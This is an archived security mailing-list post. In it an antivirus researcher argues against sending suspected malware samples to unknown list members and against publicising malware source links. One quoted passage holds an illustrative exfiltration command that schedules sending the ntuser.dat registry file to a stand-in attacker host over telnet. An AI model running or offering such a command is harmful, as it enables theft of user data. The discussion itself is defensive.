| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: nick at virus-l.demon.co.uk (Nick FitzGerald) Subject: win2kup2date.exe ? James Tucker to Harlan Carvey to me to : > > > > > ... If you want to email me a copy of it, I'll > > > > > rip it apart and see what can be seen. > > > > > > > > And world plus dog should entrust you with such > > > material because??? > > > ... most viruses, trojans and malware to not store > > > copies of stolen > > > data in their executables. Furthermore the file size > > > is very small. > > > > Interesting answer, but completely non-sequitor. Nick > > asked why this person should be trusted with a live > > bit of malware, and your response is that it's not > > very big??? What does that have to do with anything? > > Malware and viruses are VERY readily available in many places accross > the internet. Therefore this point should be of no concern. ... It feels good when you stop hitting your head aginst the door too, and there are very many doors readily available for you to hit your head against. Now, I don't know James, but I'd say it is a fair bet he doesn't hit his head against every door he sees just so he can enjoy the feeling when he stops hitting his head against each specific door. Look fool -- just because samples of some malware are easily accessible to you does not mean it is a good idea to encourage others to liberally spray copies of probably-new-and-undetected-by-many-scanners malware around willy nilly. Such encouragement is ethically dubious, at best... > ... The only > other concern which may be important is the possibility that the > binary is carrying data from the infected system; it was this that I > was refering to. Please accept my apology for not making this clearer. And that was all but irrelevant to my concerns. It is a possibility, and all the more reason to be sure that you really are sending your suspect files to a "true professional" but almost by definition, some arbitrary twit popping up in a mailing list or newsgroup saying "email me a copy of it, I'll rip it apart and see what can be seen" is _NOT_ such a person. (And, if you look at the website at the domain of his preferred address for recaiving "suspect" files, you have to question even further the suitability of this person...) > > > > P.S. Send it to [...] - it's my "catch all" for > > > > > virus/unknown files. Just be sure to ZIP it up > > > or else the web host > > > > > won't let it through. Otherwise I have disabled > > > all checks/scan. > > > > > Downloads directly to a secured Linux box. > > > > > > > > That's all very nice, but alone, far from the > > > makings of someone to > > > > entrust arbitrary, suspected malware samples to. > > > > > > "Entrust", just what exactly are you thinking you > > > might be giving away? > > > > Well, it's pretty obvious...a live bit of malware. > > It's really pretty obvious what Nick's getting > > at...why send this malware to some arbitrary person? > > Who's to say that he's going to use it as he says, and > > not send it back out to someone else? > > To what end? It would be much more useful to an attacker to go and > collect and customise one of the many readily available trojans on the > internet, rather than spreading malware which they have no control > over. IMHO your concern is closer to cynicism than practical reality. Without knowing what the malware in question was or the skills of the recipient (assuming, for a moment, that they may actually have had bad intentions), you cannot even begin to decide what is easier for them. Also, studying something that turned out to be entirely new may give someone with ill intent a better idea of how to beat the odds with their next release. But of course, that doesn't matter because the Internet is full of nasties so a few more makes no difference, eh James? Have you hit your head against that door just over to your right recently? A few really hard thwacks will be especially satisfying... <<snip Virus Total stuff>> > > > Samples of non-data carrying viruses or > > > trojans are of > > > little use to anyone other than Anti-Virus firms, as > > > it is easy to > > > collect raw source for most if one is so inclined. Malware source code is all but useless to the AV industry. It has to detect the actual code that ends up in actual malware which mostly means the binary output of compilation and linking. Having the source may help one work out a few wrinkles that the reverse engineering analysis did not resolve (usually because the time/effort/payoff estimates suggested it was not worthwhile). Such code is especially useful to the wannabe virus writer though, and almost never to professional AV researchers as, in the cases where source is released, it usually is not released until well after the AV'ers have anaylsed actual samples, added detection (and removal, etc) to their products and long since moved on. I guess your inability to comprehend this before writing the drivel above tells us even more about the value of your opinions about the desirability of sending arbitrary suspect code to arbitrary bozos that pop up on mailing lists... Oh look behind you -- there's another door... > > Really? Are you able to do so? I would submit that > > many with malicious intent don't know the sites and > > sources you seem to be aware of, and will actually ask > > for the binary...for the purpose of releasing it > > against someone else. Non-data carrying or otherwise, > > it doesn't matter. I received several IMs just this > > weekend in which I was asked for running viruses. > > Well, the same lack of trust may be given to you. ... Not at all. Your inability again to comprehend what has been said shows your severe lack of relevant experience. Very, very many folk of ill-intent approach people who publicly discuss malware (such as in this list), asking for code "to get back at my cheating girlfriend", etc, etc, etc. In fact, it's something of an occupational hazard. For all we know, the chap my original message in this sub-thread was addressed to may just be too stupid to come up with anything better than soliciting for samples in an open mailing list where folk often ask questions such as "What does qwertyuiop.exe do?". > ... In order find a > balence between proving my point and not providing you with up to date > info, I will provide you with this [...] site as an > example, which is not carrying any modern sources at this time. You > can find these easily by trawling security sites of high standards, > they have outbound links to such sites. You have that backwards. In general, the more such links a security site has, the lower its standard. Posting links to live malicious code is somewhere between grossly irresponsible and criminally negligent. Your "praise" of the practise tells us something about your mindset (though maybe it's being unhinged by all those doors?). > ... Google is rarely your freind > in this regard, which may be why you are not aware of the high > numeracy of such sites on the internet. Needless to say that this lack > of awareness is possibly a good thing for most people (read: reduces > script-kiddie access to such data). At least here we agree on something... <<snip more Virus Total stuff>> > > > If there are viruses which commonly copy target > > > system data, or > > > sensitive data into their binaries at the present > > > time (I imagine the > > > mention of this deception may well spring at least > > > one such virus) > > > then I apologise that I am not aware of it. > > > > Does it matter exactly what the malicious code does? > > In this case the deception could be very serious as capturing the > password details of a security professional is arguably more > "interesting" and might (possibly) be more valuable to an attacker. > This would be a good deceptive method of doing so. > > As to whether generically it matters what a virus does, no, of course > if a virus is defined as being such, it is malicious and should be > removed anyway. I think Harlan's (rather obvious) point was that it does not matter what it does as it is irresponsible to distribute malicious code willy nilly regardless of how mad or relatively benign it is. > Sometimes it is important to know its functionality, as what if it had > secretly run a command like: > at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337" > > The antivirus program would remove the virus, but your registry data > would still get sent to the hacker site as this data is not illegal in > the system. Before anyone has a go at me over access to ntuser.dat / > timing issues / whatever, this is concept example only; use your heads > please. And the OP may benefit from discovering that and trying to run a DNS spoof of haxorsite.com against the sender's domain... It all comes back to my question "And world plus dog should entrust [OP] with such material because???". > > > There is always no need for aggressive statement of > > > suspicion, which you are close to here. > > > While I understand aggression due to anger, I > > > am concerned that one should not get angry at > > > someone offering them a > > > service merely because one is suspicious of them. > > > What if the offer of help is entirely genuine? > > > > I think that you're entirely missing the point, as > > I've already pointed out. > > I apologise that this message of mine was not as clear as it should > have been. Thank you for pointing it out to me. And you missed the point of what you perceived as my anger -- that's just one of my common posting styles. You may see it as anger, but those that know better see it as the sharper side of my "here comes another one" attitude, honed over many, many years more experience of dealiing with fools than is healthy (at least for the new fools that come along every day). Quick -- around the corner to your left, there's another door... Regards, Nick FitzGerald
Powered by blists - more mailing lists